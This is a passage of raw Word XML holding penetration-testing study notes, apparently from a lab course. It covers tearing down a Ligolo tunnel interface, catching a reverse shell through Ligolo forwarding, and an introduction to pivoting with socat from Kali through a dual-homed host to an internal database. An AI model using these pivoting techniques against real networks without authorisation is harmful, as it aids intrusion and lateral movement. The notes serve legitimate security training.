    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000799">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000079A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim connects to port 9001, Ligolo forwards to your 4444, you catch the shell.</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000079D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e0egpwpdq1hd" w:id="66"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to delete Ligolo TUN interface for a complete reset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000079E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000079F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali Ligolo Console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete Interface and Link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip link set ligolo down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1408"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link set ligolo down</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → disable the interface.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip tuntap del dev ligolo mode tun</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1423"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip tuntap del dev ligolo mode tun </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ completely delete the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete Ip Route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;subnet&gt;/24 dev ligolo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">then do:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;subnet&gt;/24 dev ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view routes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists all current routes on your machine, including the new ligolo one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view ip route:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link show</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don’t see ligolo anymore, it’s gone.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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BC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9887gbooaanj" w:id="67"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Redirection &amp; Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007BE">
      <w:pPr>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t xml:space="preserve">Dynamic vs. Static Port Forwarding:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Static port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> forwarding only allows for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one port and one target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">forwarding allows for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> multiple ports and multiple target machines</w:t>
      </w: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C4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ast28pb9g25y" w:id="68"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Forwarding with Socat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We want to interact with a port on a target machine (port 5432 on PGDATABASE01) but the machine is in a different subnet from our Kali. But, there is a dual-homed middleman (CONFLUENCE01) in both subnets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="892"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: we can also use port forwarding for machines on the same sub-net. For example, a target machine might have a firewall configured against our kali. So we have to pivot by port forwarding to a middle man who can directly access the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="892"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or this can be used when a target machine's service is only listening on loopback, so we can run socat on it and then make it port forward to itself to access service</w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We run Socat on the "middle" man that has access to both subnets. And then we configure socat so that the middle man is listening on a single port, and then it re-directs that traffic to the desired port on the desired machine (PGDATABASE01). And then we just interact with that port on the middleman (CONFLUENCE01) in order to interact with the target machine (PGDATBASE01) from our Kali. </w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5373886" cy="2185988"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="358" name="image342.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image342.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId173"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5373886" cy="2185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CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, all machines are Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are trying to get from Kali to PGDATABASE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007CE">
      <w:pPr>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t xml:space="preserve">Once we reverse shell into CONFLUENCE01, then we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5456954" cy="3882833"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="90" name="image95.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image95.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId174"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
